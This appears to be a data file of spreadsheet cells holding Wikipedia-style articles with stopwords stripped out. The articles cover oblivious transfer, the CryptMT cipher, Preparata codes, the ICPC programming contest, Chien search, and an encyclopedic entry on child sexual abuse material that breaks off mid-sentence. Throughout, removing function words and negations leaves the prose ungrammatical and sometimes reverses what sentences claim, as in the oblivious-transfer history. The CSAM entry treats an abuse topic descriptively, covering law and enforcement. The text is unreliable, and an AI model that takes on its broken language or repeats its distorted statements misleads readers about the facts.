requires roughly cost oblivious transfer amortized setting. brassard, crépeau robert generalized notion oblivious transfer,5 wherein receiver obtains messages message collection. messages received simultaneously ("non-adaptively"), requested consecutively, request based previous messages received.6 generalized oblivious transfer oblivious transfer special case generalized oblivious transfer, presented ishai kushilevitz.7 setting, sender messages, transfer constraints specified collection permissible subsets receiver obtain subset messages appears collection sender remain oblivious selection made receiver, receiver cannot learn value messages outside subset messages chose obtain. collection monotone decreasing, sense closed containment (i.e., given subset collection subsets solution proposed ishai kushilevitz uses parallel invocations oblivious transfer making special model private protocols. later solutions based secret sharing published bhavani shankar, kannan srinathan, pandu rangan,8 another tamir tassa.9 origins early seventies stephen wiesner introduced primitive called multiplexing seminal paper "conjugate coding", starting point quantum cryptography.[1] unfortunately took years published. even though primitive equivalent later called oblivious transfer, wiesner application cryptography. quantum oblivious transfer protocols oblivious transfer implemented quantum systems. contrast tasks quantum cryptography, like quantum distribution, shown quantum oblivious transfer cannot implemented unconditional security, i.e. security quantum oblivious transfer protocols cannot guaranteed laws quantum physics. also k-anonymity secure multi-party computation zero-knowledge proof private information retrieval references stephen wiesner, "conjugate coding", sigact news, vol. 1983, 78–88; original manuscript written circa 1970. michael rabin. "how exchange secrets oblivious transfer." technical report tr-81, aiken computation laboratory, harvard university, 1981. scanned handwriting typed version eprint.iacr.org archive. typed version available dousti's homepage. even, goldreich, lempel, randomized protocol signing contracts", communications acm, volume issue 637–647, 1985. paper catuscia palamidessi's page claude crépeau. "equivalence flavours oblivious transfer". advances cryptology: crypto '87, volume lecture notes computer science, pages 350–354. springer, 1988 kilian. "founding cryptography oblivious transfer", proceedings, 20th annual symposium theory computation (stoc), 1988. paper portal (subscription required) gilles brassard, claude crépeau jean-marc robert. "all-or-nothing disclosure secrets." advances cryptology: crypto ’86, volume lncs, pages 234–238. springer, 1986. moni naor benny pinkas. "oblivious transfer adaptive queries." advances cryptology: crypto ’99, volume 1666 lncs, pages 573–590. springer, 1999. yuval ishai eyal kushilevitz. "private simultaneous messages protocols applications." proc. istcs’97, ieee computer society, pages 174–184, 1997. bhavani shankar, kannan srinathan pandu rangan. "alternative protocols generalized oblivious transfer". proc. icdcn’08, lncs 4904, pages 304–309, 2008. tamir tassa. "generalized oblivious transfer secret sharing". designs, codes cryptography, volume 58:1, pages 11–21, january 2011. paper openu.ac.il ^10. moni naor benny pinkas (1990). oblivious polynomial evaluation 31st stoc ^11. william aiello, yuval ishai omer reingold (2001) priced oblivious transfer: sell digital goods eurocrypt proceedings international conference theory application cryptographic techniques: advances cryptology, pages 119–135 ^12. sven laur helger lipmaa (2007). protocol conditional disclosure secrets applications". jonathan katz moti yung, editors, acns, lecture notes computer science 4521: 207–225. springer, heidelberg. ^13. vladimir kolesnikov, ranjit kumaresan, mike rosulek, trieu (2017). "efficient batched oblivious applications private intersection". edgar r.weippl, stefan katzenbeisser, christopher kruegel, andrew myers, shai halevi, editors, pages 818–829. press, october 2016. ^14. giovanni crescenzo, malkin, rafail ostrovsky: single database private information retrieval implies oblivious transfer. eurocrypt 2000: 122-138 ^15. eyal kushilevitz, rafail ostrovsky: replication needed: single database, computationally-private information retrieval. focs 1997: 364-373 external links helger lipmaa's collection links topic</t>
  </si>
  <si>
    <t>CryptMT</t>
  </si>
  <si>
    <t>cryptography, cryptmt stream cipher algorithm internally uses mersenne twister. developed makoto matsumoto, mariko hagita, takuji nishimura mutsuo saito patented. submitted estream project ecrypt network. submission estream, authors also included another cipher named fubuki, also uses mersenne twister. external links estream page cryptmt cryptmt author's page</t>
  </si>
  <si>
    <t>Preparata code</t>
  </si>
  <si>
    <t>coding theory, preparata codes form class non-linear double-error-correcting codes. they named franco preparata first described 1968. although non-linear gf(2) preparata codes linear distance. construction number, {\displaystyle n=2^{m}-1} first describe extended preparata code length {\displaystyle 2n+2=2^{m+1}} preparata code derived deleting position. words extended code regarded pairs 2m-tuples, corresponding subsets finite field gf(2m) fixed way. extended code contains words satisfying three conditions even weight; {\displaystyle \sum _{x\in x}x=\sum _{y\in y}y;} {\displaystyle \sum _{x\in x}x^{3}+\left(\sum _{x\in x}x\right)^{3}=\sum _{y\in y}y^{3}.} preparata code obtained deleting position corresponding gf(2m). properties preparata code length 2m+1 size minimum distance when preparata code length also called nordstrom–robinson code. references f.p. preparata (1968). class optimum nonlinear double-error-correcting codes". information control. (4): 378–400. doi:10.1016/s0019-9958(68)90874-7. j.h. lint (1992). introduction coding theory. gtm. vol. (2nd ed.). springer-verlag. 111–113. isbn 3-540-54894-7. http://www.encyclopediaofmath.org/index.php/preparata_code http://www.encyclopediaofmath.org/index.php/kerdock_and_preparata_codes</t>
  </si>
  <si>
    <t>International Collegiate Programming Contest</t>
  </si>
  <si>
    <t>icpc international collegiate programming contest, known icpc, annual multi-tiered competitive programming competition among universities world. directed icpc executive director baylor professor william poucher, icpc operates autonomous regional contests covering continents culminating global world finals every year. 2018, icpc participation included 52,709 students 3,233 universities countries. icpc operates auspices icpc foundation operates agreements host universities non-profits, accordance icpc policies procedures. from 1977 2017 icpc held auspices referred acm-icpc. mission icpc, “international collegiate programming contest”, extra-curricular, competitive programming sport students universities around world. icpc competitions provide gifted students opportunities interact, demonstrate, improve teamwork, programming, problem-solving process. icpc global platform academia, industry, community shine spotlight raise aspirations next generation computing professionals pursue excellence. words, icpc algorithmic programming contest college students. teams three, representing university, work solve real-world problems, fostering collaboration, creativity, innovation, ability perform pressure. through training competition, teams challenge raise possible. quite simply, oldest, largest, prestigious programming contest world history icpc traces roots competition held texas university 1970 hosted alpha chapter upsilon epsilon computer science honor society (upe). this initial programming competition titled first annual texas collegiate programming championship university represented team five members. computer used model first machines (dynamic address translator "paging") system accessing memory. start competition delayed minutes four "memory bank" amplifiers down. teams participated included, texas a&amp;m, texas tech, university houston, five texas university colleges. there three problems completed cumulative time "start" "successful completion" determined first-, second-, third-place winners. programming language used fortran. programs written coding sheets, keypunched hollerith cards, submitted execution. university houston team competition completing three problems successfully time. second- third-place teams successfully complete three problems. contest evolved present form multi-tier competition 1977, first finals held conjunction computer science conference. from 1977 1989, contest included mainly teams four universities throughout united states canada. icpc headquarters hosted baylor university 1989 2022, regional contests established within world's university community, icpc grown worldwide competition. increase access world finals, teams reduced three students within first five academic years.from 1997 2017, international business machines corporation (ibm) sponsor icpc. during time contest participation grown 2000%. 1997, teams universities participated. 2017, 46,381 students 2,948 universities countries continents participated regional competitions. organized highly localized extra-curricular university mind sport operating globally-coordinated unincorporated association operating agreements host universities non-profits, icpc open qualified teams every university world.upe provided continuous support since 1970 honored world finalists since first finals 1976. icpc indebted member contributions assistance 1976 2018. baylor university served since 1985, hosting icpc headquarters 1989 2022. icpc operates auspices icpc foundation provides icpc global headquarters service globally-coordinated community whose events operate agreements host universities non-profits insure participation icpc open qualified teams every university world. icpc policies procedures.the icpc world finals (the annual world finals international collegiate programming contest) final round competition. over history become 4-day event held finest venues worldwide teams competing 2018 world finals. recent world champion teams recognized country's head state. recent years, media impressions hovered billion mark.since 2000, teams russia, china, poland icpc world finals. participation north america much smaller rest world, partially attributed perceived payoff participating. contest rules icpc contests team competitions. current rules stipulate team consist three students. participants must university students, less five years university education contest. students previously competed world finals five regional competitions ineligible compete again.during contest, teams three given hours solve eight fifteen programming problems (with eight typical regionals twelve finals). they must submit solutions programs c++, java, ada, python kotlin (although guaranteed every problem solvable certain language, icpc website states "the judges solved problems java c++" regional world finals competitions). programs test data. program fails give correct answer, team notified submit another program. winner team correctly solves problems. necessary rank teams medals prizes among tying teams, placement teams determined elapsed times point submitted correct solutions plus minutes rejected submission problem ultimately solved. there time consumed problem solved.compared programming contests (for example, international olympiad informatics), icpc characterized large number problems (eight problems hours). another feature team computer, although teams three students. this makes time pressure even greater. good teamwork ability withstand pressure needed win. 2004–2021 finals 2004 world finals 2004 acm-icpc world finals hosted obecni dum, prague, czech technical university prague. 3,150 teams representing 1,411 universities countries competed elimination rounds, teams proceeding world finals. petersburg institute fine mechanics optics russia won, solving problems. gold medalists petersburg institute fine mechanics optics, royal institute technology (sweden), belarusian state university, perm state university (russia). 2005 world finals 2005 world finals held pudong shangri-la hotel shanghai april 2005, hosted shanghai jiaotong university. 4,109 teams representing 1,582 universities countries competed elimination rounds, teams proceeding world finals. shanghai jiaotong university second world title, problems solved. gold medal winners shanghai jiaotong, moscow state university, petersburg institute fine mechanics optics (russia), university waterloo (canada). 2006 world finals 2006 acm-icpc world finals held antonio, texas, hosted baylor university. 5,606 teams representing 1,733 universities countries competed elimination rounds, teams proceeding world finals. saratov state university russia won, solving problems. gold medal winners saratov, jagiellonian university (poland), altai state technical university (russia), university twente (the netherlands). 2007 world finals 2007 acm-icpc world finals held tokyo hilton, tokyo, japan, march 12–16, 2007. world finals hosted japan chapter tokyo research lab. some 6,099 teams competed continents regional level. eighty-eight teams advanced world finals. warsaw university second world championship, solving problems. gold medal winners warsaw university, tsinghua university (china), petersburg institute fine mechanics optics (russia), massachusetts institute technology (united states). silver medal winners include shanghai jiao tong university (china) universities. 2008 world finals 2008 acm-icpc world finals held fairmont banff springs hotel, banff, alberta, canada, april 6–10, 2008. world finals hosted university alberta. there teams world finals, 6700 total teams competing earlier rounds. petersburg institute fine mechanics optics second world championship. massachusetts institute technology, izhevsk state technical university, lviv national university also received gold medals. 2009 world finals 2009 acm-icpc world finals held stockholm, sweden, april 18–22, campus hosting institution, royal institute technology, well grand hotel, radisson strand, diplomat hotel. there teams regional sites competing world championship. petersburg institute fine mechanics optics defended title, winning third world championship. tsinghua university, petersburg state university, saratov state university also received gold medals. 2009 world finals pioneered live video broadcasting entire contest, featuring elements expert commentary, live feeds teams computer screens interviews judges, coaches dignitaries. event broadcast online, well swedish television channel axess 2010 world finals 2010 acm-icpc world finals held harbin, china. host harbin engineering university. shanghai jiao tong university world championship. moscow state university, national taiwan university, taras shevchenko kiev national university also received gold medals. 2011 world finals 2011 acm-icpc world finals held orlando, florida hosted main sponsor ibm. contest initially scheduled held sharm el-sheikh, egypt february, moved political instability associated arab spring. zhejiang university took first place university michigan arbor, tsinghua university, saint petersburg state university taking 2nd, 3rd, respectively receiving gold medals. china(2g) united states(1g) russia(1g,2s,2b) germany(1s) ukraine(1s) poland(1b) canada(1b) 2012 world finals 2012 world finals held warsaw, poland. they inaugurated hosted university warsaw. petersburg institute fine mechanics optics fourth world championship, university time. university warsaw, moscow institute physics technology, shanghai jiao tong university took 2nd, 3rd, place respectively receiving gold medals. russia(2g,1b) china(1g,1s) poland(1g) united states(1s) hong kong(1s) belarus(1s,1b) canada(1b) japan(1b) 2013 world finals 2013 world finals held saint petersburg, russia. they inaugurated july hosted itmo. 2013 thirteen teams received medals are: japan(1g) russia(1g,1s,2b) china(1g,1b) taiwan(1g) poland(1s,1b) ukraine(1s) belarus(1s) united states(1b) saint petersburg state university information technologies, mechanics optics (gold, world champion), shanghai jiao tong university (gold, place), university tokyo (gold, place), national taiwan university (gold, place), petersburg state university(silver, place), university warsaw (silver, place), taras shevchenko national university kyiv (silver, place), belarusian state university (silver, place), jagiellonian university krakow (bronze, place), moscow state university (bronze, 10th place), carnegie mellon university (bronze, 11th place), tsinghua university (bronze, 12th place), perm state university (bronze, 13th place). 2014 world finals 2014 world finals held ekaterinburg, russia june 21–25, hosted ural federal university. final competition held june. teams participated competition petersburg state university became world champion.following teams awarded medals icpc 2014:russia(2g,2b) china(1g,1s,1b) taiwan(1g) japan(1s) poland(1s) croatia(1s) slovakia(1b) gold petersburg state university moscow state university peking university national taiwan universitysilver university warsaw shanghai jiao tong university university tokyo university zagrebbronze petersburg national research university mechanics optics national research university higher school economics tsinghua university comenius university 2015 world finals 2015 world finals held marrakesh (morocco) 16–21, hosted mohammed fifth university, akhawayn university mundiapolis university. final competition teams competed world champion. winner saint petersburg itmo, solving proposed problems (13) first time ever. russia (2g), china (1g, 1s), japan (1g), united states (1b, 1s), croatia (1s), czech republic (1s), korea (1b), poland (1b). gold itmo university moscow state university university tokyo tsinghua universitysilver peking university university california, berkeley university zagreb charles universitybronze shanghai jiao tong university massachusetts institute technology korea university university warsaw 2016 world finals 2016 world finals held phuket (thailand) 16–21. final competition teams competed world champion. winner saint petersburg state university solving problems proposed problems. second winner shanghai jiao tong university minutes behind spsu, also problems solved. gold saint petersburg state university shanghai jiao tong university harvard university moscow institute physics technologysilver university warsaw massachusetts institute technology petersburg itmo university ural federal universitybronze university warsaw lobachevsky state university nizhny novgorod lviv national university fudan university 2017 world finals 2017 world finals held rapid city, south dakota (united states) 20–25, hosted excellence computer programming. visa issue, several teams unable present onsite, affected schools allowed direct qualifications icpc 2018 besides usual qualification spots. winner itmo university. teams following countries awarded medals icpc 2017: russia gold, silver, bronze), poland gold), south korea gold, bronze), china silver), sweden bronze), japan bronze). gold itmo university university warsaw seoul national university saint petersburg state universitysilver moscow institute physics technology tsinghua university peking university fudan universitybronze kaist ural federal university royal institute technology university tokyo 2018 world finals 2018 world finals held beijing (china), april 15–20, hosted peking university. gold moscow state university moscow institute physics technology peking university university tokyosilver seoul national university university south wales tsinghua university shanghai jiao tong universitybronze itmo university university central florida massachusetts institute technology vilnius university ural federal university medals granted 2018 world final archived wayback machine (archived april 2018) 2018 world final, problems "conquer world" "uncrossed knight's tour" solved. 2019 world finals 2019 world finals held porto (portugal) march april 2019, hosted university porto city porto.gold moscow state university massachusetts institute technology university tokyo university warsawsilver national taiwan university university wroclaw seoul national university chaek university technologybronze sharif university technology moscow institute physics technology national research university higher school economics chinese university hong kong 2020–2021 world finals because covid-19 pandemic, 2020 world finals postponed. finally took place moscow (russia) october october 2021, hosted moscow institute physics technology.gold state university nizhny novgorod seoul national university itmo university moscow institute physics technologysilver university wroclaw university cambridge belarusian state university university bucharestbronze massachusetts institute technology kharkiv national university radio electronics university illinois urbana-champaign higher school economics medals granted 2020–2021 world finals "icpc world finals moscow final standings". icpc world finals. retrieved 2021-10-16. 2020–2021 world final, problems (space walls) (sweep stakes) solved. winners renowned participants some former icpc finalists made remarkable achievements software industry research. they include adam d'angelo, former facebook founder quora; nikolai durov, co-founder telegram messenger; matei zaharia, creator apache spark; tony hsieh, zappos venture capitalist; craig silverstein, first employee google. also student research competition competitive programming, type mind sport involved programming competitions online judge, service practice programming contests online pc², programming contest control system support computer programming contest activities (used icpc world finals 2008) references external links official website acm-icpc maintained baylor university.</t>
  </si>
  <si>
    <t>Chien search</t>
  </si>
  <si>
    <t>abstract algebra, chien search, named robert tienwen chien, fast algorithm determining roots polynomials defined finite field. chien search commonly used find roots error-locator polynomials encountered decoding reed-solomon codes codes. algorithm problem find roots polynomial λ(x) (over finite field gf(q)): {\displaystyle \lambda (x)=\lambda _{0}+\lambda _{1}x+\lambda _{2}x^{2}+\cdots +\lambda _{t}x^{t}} roots found using brute force: finite number polynomial evaluated element polynomial evaluates zero, element root. trivial case coefficient need tested zero. below, concern non-zero straightforward evaluation polynomial involves o(t2) general multiplications o(t) additions. efficient scheme would horner's method o(t) general multiplications o(t) additions. both approaches evaluate elements finite field order. chien search improves upon selecting specific order non-zero elements. particular, finite field (constant) generator element chien tests elements generator's order ..... consequently, chien search needs o(t) multiplications constants o(t) additions. multiplications constants less complex general multiplications. chien search based observations: each non-zero {\displaystyle \beta expressed {\displaystyle \alpha ^{i_{\beta {\displaystyle i_{\beta {\displaystyle \alpha primitive element {\displaystyle \mathrm {gf} (q)} {\displaystyle i_{\beta power number primitive element {\displaystyle \alpha thus powers {\displaystyle \alpha ^{i}} {\displaystyle 0\leq i&lt;(q-1)} cover entire field (excluding zero element). following relationship exists: {\displaystyle {\begin{array}{lllllllllll}\lambda (\alpha ^{i})&amp;=&amp;\lambda _{0}&amp;+&amp;\lambda _{1}(\alpha ^{i})&amp;+&amp;\lambda _{2}(\alpha ^{i})^{2}&amp;+&amp;\cdots &amp;+&amp;\lambda _{t}(\alpha ^{i})^{t}\\&amp;\triangleq &amp;\gamma _{0,i}&amp;+&amp;\gamma _{1,i}&amp;+&amp;\gamma _{2,i}&amp;+&amp;\cdots &amp;+&amp;\gamma _{t,i}\\\lambda (\alpha ^{i+1})&amp;=&amp;\lambda _{0}&amp;+&amp;\lambda _{1}(\alpha ^{i+1})&amp;+&amp;\lambda _{2}(\alpha ^{i+1})^{2}&amp;+&amp;\cdots &amp;+&amp;\lambda _{t}(\alpha ^{i+1})^{t}\\&amp;=&amp;\lambda _{0}&amp;+&amp;\lambda _{1}(\alpha ^{i})\,\alpha &amp;+&amp;\lambda _{2}(\alpha ^{i})^{2}\,\alpha ^{2}&amp;+&amp;\cdots &amp;+&amp;\lambda _{t}(\alpha ^{i})^{t}\,\alpha ^{t}\\&amp;=&amp;\gamma _{0,i}&amp;+&amp;\gamma _{1,i}\,\alpha &amp;+&amp;\gamma _{2,i}\,\alpha ^{2}&amp;+&amp;\cdots &amp;+&amp;\gamma _{t,i}\,\alpha ^{t}\\&amp;\triangleq &amp;\gamma _{0,i+1}&amp;+&amp;\gamma _{1,i+1}&amp;+&amp;\gamma _{2,i+1}&amp;+&amp;\cdots &amp;+&amp;\gamma _{t,i+1}\end{array}}} words, define {\displaystyle \lambda (\alpha ^{i})} terms {\displaystyle \{\gamma _{j,i}|0\leq j\leq t\}} next coefficients derived thus: {\displaystyle \gamma _{j,i+1}=\gamma _{j,i}\,\alpha ^{j}} way, start {\displaystyle i=0} {\displaystyle \gamma _{j,0}=\lambda _{j}} iterate value {\displaystyle {\displaystyle (q-1)} stage resultant summation zero, i.e. {\displaystyle \sum _{j=0}^{t}\gamma _{j,i}=0,} {\displaystyle \lambda (\alpha ^{i})=0} also, {\displaystyle \alpha ^{i}} root. way, check every element field. when implemented hardware, approach significantly reduces complexity, multiplications consist variable constant, rather variables brute-force approach. references chien, (october 1964), "cyclic decoding procedures bose-chaudhuri-hocquenghem codes", ieee transactions information theory, it-10 (4): 357–363, doi:10.1109/tit.1964.1053699, issn 0018-9448 lin, shu; costello, daniel (2004), error control coding: fundamentals applications (second ed.), englewood cliffs, prentice-hall, isbn 978-0130426727 gill, john (n.d.), ee387 notes handout (pdf), stanford university, 42–45, archived original (pdf) 2014-06-30, retrieved april 2010</t>
  </si>
  <si>
    <t>Child pornography</t>
  </si>
  <si>
    <t>child pornography (also called child sexual abuse material, csam, child porn, kiddie porn) pornography unlawfully exploits children sexual stimulation. produced direct involvement sexual assault child (also known child sexual abuse images) simulated child pornography. abuse child occurs sexual acts lascivious exhibitions genitals pubic areas recorded production child pornography. child pornography variety mediums, including writings, magazines, photos, sculpture, drawing, painting, animation, sound recording, video, video games. child pornography created profit reasons.laws regarding child pornography generally include sexual images involving prepubescents, pubescent, post-pubescent minors computer-generated images appear involve them. most possessors child pornography arrested found possess images prepubescent children; possessors pornographic images post-pubescent minors less likely prosecuted, even though images also fall within statutes.the prepubescent pornography viewed collected pedophiles variety purposes, ranging private sexual uses, trading pedophiles, preparing children sexual abuse part process known "child grooming", enticement leading entrapment sexual exploitation production child pornography child prostitution. children also sometimes produce child pornography initiative coercion adult.child pornography illegal censored jurisdictions world. ninety-four interpol member states laws specifically addressing child pornography 2008, though include nations pornography. countries, criminalized possession child pornography regardless intent distribute. both distribution possession criminal offenses almost western countries. wide movement working globalize criminalization child pornography, including major international organizations united nations european commission. producers child pornography avoid prosecution distributing material across national borders, though issue increasingly addressed regular arrests suspects number countries occurring last decade. terminology 2000s, term child abuse images increased scholars enforcement personnel term "pornography" carry inaccurate implication consent create distance abusive nature material. similar term, child sexual abuse material, used official bodies, similar terms "child abuse material", "documented child sexual abuse", "depicted child sexual abuse" also used, acronyms cai. term "child pornography" retains legal definitions various jurisdictions, along related terms "indecent photographs child" others. 2008, world congress sexual exploitation children adolescents stated formally adopted pact that:increasingly term 'child abuse images' used refer sexual exploitation children adolescents pornography. this reflect seriousness phenomenon emphasize pornographic images children fact records crime committed.interpol policing institutions various governments, including among others united states department justice, enforce child pornography laws internationally. since 1999, interpol standing working group offenses against minors used following definition: child pornography consequence exploitation sexual abuse perpetrated child. defined means depicting promoting sexual abuse child, including print and/or audio, centered acts genital organs children. child sexual abuse production distribution abuse child occurs sexual acts lascivious exhibitions genitals pubic areas recorded production child pornography. children ages, including infants, abused production child pornography. united states department justice estimates pornographers recorded abuse million children united states alone. there increasing trend towards younger victims greater brutality; according flint waters, investigator federal internet crimes against children task force, "these guys raping infants toddlers. hear child crying, pleading help video. horrendous." according world congress commercial sexual exploitation children, "while impossible obtain accurate data, perusal child pornography readily available international market indicates significant number children sexually exploited medium."the united kingdom children's charity stated demand child pornography internet increase abuse cases, increase number children abused production process. study analyzing arrested child pornography possession united states one-year period 2000 2001, pornographic images prepubescent children images graphically depicting sexual penetration. images depicting violence bondage, rape, torture involved images children gagged, bound, blindfolded, otherwise enduring sadistic sex. child-pornography videos motion sound. also images nude semi-nude children, possessed images alone. enforcement found graphic still images, 1,000 graphic images. "dual offenders", sexually victimized children possessed child pornography.a 2007 study ireland, undertaken garda síochána, revealed serious content sample cases involving indecent images children. cases, serious images depicted nudity erotic posing, depicted sexual activity children, depicted non-penetrative sexual activity adults children, depicted penetrative sexual activity adults children, depicted sadism bestiality. relation child molestation abuse experts differ causal link child pornography child sexual abuse, experts saying increases risk child sexual abuse, others saying child pornography reduces risk offending. 2008 american review internet communication lure children outlines possible links actual behaviour regarding effects internet child pornography.according paper mayo clinic based case reports treatment, individuals viewed child pornography individuals arrested internet child pornography molested child. total number view images ascertained, ratio passive viewing molestation remains unknown. report also notes difficult define progression computerized child pornography physical acts children. several professors psychology state memories child abuse maintained long visual records exist, accessed, "exploited perversely." study wolak, finkelhor, mitchell states that:rates child sexual abuse declined substantially since mid-1990s, time period corresponds spread online. fact trend revealed multiple sources tends undermine arguments reduced reporting changes investigatory statistical procedures. [t]o date, spike rate child sexual abuse corresponds apparent expansion online typology late 1990s, copine project ("combating paedophile information networks europe") university college cork, cooperation paedophile unit london metropolitan police, developed typology categorize child abuse images research enforcement. ten-level typology based analysis images available websites internet newsgroups. other researchers adopted similar ten-level scales. 2002 sentencing advisory panel adapted copine scale five levels recommended adoption sentencing guidelines, omitting levels recommending levels combine sentencing level four levels form individual severity level, total sentencing stages. proliferation internet proliferation philip jenkins notes "overwhelming evidence [child pornography] impossible obtain nonelectronic means." internet radically changed child pornography reproduced disseminated, and, according united states department justice, resulted massive increase "availability, accessibility, volume child pornography." production child pornography become profitable longer limited paedophiles.digital cameras internet distribution facilitated credit cards ease transferring images across national borders made easier ever users child pornography obtain photographs videos. ncmec estimated 2003 since 1997 number child pornography images available internet increased 1500%.in 2007, british-based internet watch foundation reported child pornography internet becoming brutal graphic, number images depicting violent abuse risen fourfold since 2003. stated "the worrying issue severity gravity images increasing. we're talking prepubescent children raped." about percent children abusive images female, percent appear children prosecution difficult multiple international servers used, sometimes transmit images fragments evade law. some child pornographers also circumvent detection using viruses illegally gain control computers remotely store child pornography. case, massachusetts charged possession child pornography hackers used computer access pornographic sites store pornographic pictures without knowledge. u.s. court appeals tenth circuit ruled user downloads child pornography file sharing network possesses "shared folder" without configuring software share content, charged distributing child pornography.regarding internet proliferation, u.s. department justice states time estimated million pornographic images children internet, images posted daily." they also note single offender arrested u.k. possessed 450,000 child pornography images, single child pornography site received million hits month. further, much trade child pornography takes place hidden levels internet, estimated 50,000 100,000 paedophiles involved organised pornography rings around world, third operate united states. massive international child pornography ring centered netherlands. largest ever operation kind, police countries arrested suspects identified others. dutch authorities arrested 37-year-old israeli-born dutch citizen amir ish-hurwitz, founder owner internet forum boylover.net, center ring. peak, forum 70,000 members around world.for brief time april 2016 september 2017 dark site known "childs play" active. investigators later discovered site group australian police.in 2008, google search engine adapted software program order faster track child pornography accessible site. software based pattern recognition engine.from 2017 2019, internet watch foundation said found videos child sexual abuse (including child rape) pornhub. pornhub quickly removed content.in 2019, york times reported child pornography crisis. tech companies facebook, microsoft dropbox reported million cases child sexual abuse material double found year million 2014.in april 2020, three published documentary found single day, third twitter profiles globally advertising 'nudes4sale' similar) appeared belong underage individuals various platforms, many used onlyfans share content. cybersex trafficking child victims cybersex trafficking forced live streaming, pornographic exploitation webcam recorded later sold. victims raped traffickers coerced perform acts children filmed broadcast real time. they frequently forced watch paying consumers shared screens follow orders. occurs 'cybersex dens', rooms equipped webcams. overseas predators pedophiles seek watch victims. collector behavior motives viewers child pornography pedophiles particularly obsessive collecting, organizing, categorizing, labeling child pornography collection according age, gender, fantasy. according agent lanning, "collecting" pornography mean merely view pornography, save comes define, fuel, validate cherished sexual fantasies." extensive collection indicates strong sexual preference children, collector child pornography also pedophile, owned collection single best indicator wants national society prevention cruelty children describes researchers taylor quayle's analysis pedophile pornography collecting: obsessive nature collecting narrative thematic links collections, building social communities internet dedicated extending collections. through "virtual communities" collectors able downgrade content abusive nature collections, children involved objects rather people, behaviour normal: expression 'love' children rather abuse. these offenders likely employ elaborate security measures avoid detection. notes "there core veteran offenders, active pedophile newsgroups years, possess high levels technological expertise," also noting pedophile bulletin boards often contain technical advice child pornography users' hands newcomers."a 1986 u.s. senate report found motives people's collecting child pornography include arousal gratification; validation justification pedophile behaviour; show images children lower inhibitions engage sex; preservation image child sexual preference; blackmail depicted individuals; medium exchange communication child pornography consumers; profit. 2012 u.s. sentencing commission report found child pornography offenders, "much likely sexually aroused children contact offenders general population", also non-sexual motives collecting child pornography, including initial curiosity, compulsive collecting behaviors, avoidance stress dissatisfaction life, ability create socially successful identity (within online community). some offenders find collecting child pornography enjoyable regardless whether images sexually exciting them; interest assembling complete sets organizing material pastime, analogously stamp collector might do.a study published journal child abuse neglect january 2021 researchers university edinburgh george mason university looked collecting viewing behaviors individuals previously convicted child pornography offences united states. researchers sent letter postal service previously convicted individuals compared results behaviors non-offending individuals united states. study found offenders organize collection deleted entire collection least once. offenders also displayed diverse interest adult pornography non-offenders. they likely view bestiality, hentai, teen nudist material. they also found none offenders viewed child pornography exclusively, saying viewed adult pornography child pornography. respondents also self-reported post-conviction pornography viewing habits respondents saying continued view child pornography post-conviction lesser frequency pre-conviction. conclusion reached researchers treatment professionals consider motivations offenders beyond primarily pedophilic interests. they suggested problematic internet usage, general pornography consumption, coping issues, novelty seeking appropriate motivators offenders. child tourism tourists created source child pornography distributed worldwide. most victims child tourism reside developing countries world. 1996, court thailand convicted german national child molestation production pornography commercial purposes; involved child pornography ring exploited thai children. sizable portion pornography seized sweden netherlands 1990s produced tourists visiting southeast asia. interpol works member countries combat problem, launched first-ever successful global appeal assistance 2007 identify canadian man, christopher paul neil, featured series around photographs shown sexually abusing young vietnamese cambodian children. organized crime organized crime involved production distribution child pornography, found common element organized crime profiles. organized groups produce distribute pornography, often called "sex rings". 2003, international police investigation uncovered germany-based child pornography ring involving 26,500 suspects swapped illegal images internet countries. 2006 case, international authorities charged people nine states three countries connection child pornography ring federal authorities described "one worst" discovered. assistant secretary immigration customs enforcement added case reflected three larger trends becoming common child pornography rings. increasing prevalence "home-grown" pornographic images produced predators themselves, include live streaming video images children abused, circulation repeated images. another trend growing sophisticated security measures peer-to-peer networking, participants share files another computers rather downloading site. group used encryption data destruction software protect files screening measures ensure authorized participants could enter chat room. third trend increasingly violent graphic nature images involving abuse younger children.according gamble, child exploitation online protection centre, around cent sites showing children abused operated pay-per-view basis. "the people involved sites often they're deviant nature. they're they're business people. it's risk versus profits. need reduce profit motivation." ceopp established 2006, targets finances organised criminal gangs selling images child abuse.the majority child pornography seized united states produced distributed profit, little evidence organized criminals operating profit motivation major source child pornography's international dissemination. laws history united states, first federal for-profit production distribution child pornography protection children against sexual exploitation 1977. response york ferber, u.s. (1982), u.s. supreme court decision allowing prohibition child pornography even meet obscenity standard established miller california, congress passed child protection 1984, broadening definition child pornography criminalizing nonprofit child pornography trafficking. 1986 meese report found child pornography cause serious harm; passage child sexual abuse pornography 1986, increased penalties repeat offenders.the u.s. supreme court decision osborne ohio, u.s. (1990), ruled u.s. constitution allowed prohibition child pornography possession. court noted time decision, u.s. states laws books prohibiting child pornography possession. 2015, u.s. states laws. provisions child pornography prevention 1996 banned virtual child pornography struck ashcroft free speech coalition, u.s. (2002). congress passed several laws increasing penalties child pornography offenses, 1997 2007, mean sentence child pornography offenders increased 20.59 months 91.30 months confinement, increase 443%. 2003, congress passed protect act, authorizing lifetime terms federal supervised release child pornography offenders; since u.s. sentencing guidelines recommend imposing maximum term supervised release offenders, means lifetime term supervised release recommended child pornography offenders. during 2006, 3,661 suspects referred u.s. attorneys child exploitation offenses. child pornography constituted referrals, followed abuse (16%) transportation (14%). 2006, median prison sentence imposed greatest abuse offenses months) followed child pornography months) transportation months). median sentenced transportation months 2006 1996. median sentence increased months abuse months child pornography. comparison, median prison terms drug weapon offenders remained stable increased violent offenses.a bill named internet safety act, intended stop child pornography protect children online predators requiring internet service providers keep track data pertaining users assigned temporarily assigned network address, introduced 2009 finally enacted. fiscal year 2010, average term supervised release non-production offenders approximately years; average term supervised release offenders sentenced production guideline nearly years. international coordination enforcement investigations include 1999 operation cathedral resulted multi-national arrests convictions well uncovering 750,000 images 1,200 unique identifiable faces distributed web; operation amethyst occurred republic ireland; operation auxin occurred australia; operation avalanche; operation based united kingdom; operation pin; operation predator; 2004 ukrainian child pornography raids; 2007 international child pornography investigation. three-year europol investigation, dubbed operation rescue, based activities boylover.net, popular pedophile chat room, netted arrests rescue children 2011. principal boylover.net, israeli-born dutch citizen amir ish-hurwitz, jailed march 2011 netherlands. hundreds additional suspects remain large.even based nspcc said worldwide estimated child pornography websites still removed year identified.one primary mandates international policing organization interpol prevention crimes children involving crossing international borders, including child pornography forms exploitation trafficking children.the department justice coordinates programs track prosecute child pornography offenders across jurisdictions, local police departments federal investigations, international cooperation governments. efforts department combat child pornography includes national child victim identification program, world's largest database child pornography, maintained child exploitation obscenity section united states department justice national center missing exploited children (ncmec) purpose identifying victims child abuse. police agencies deployed 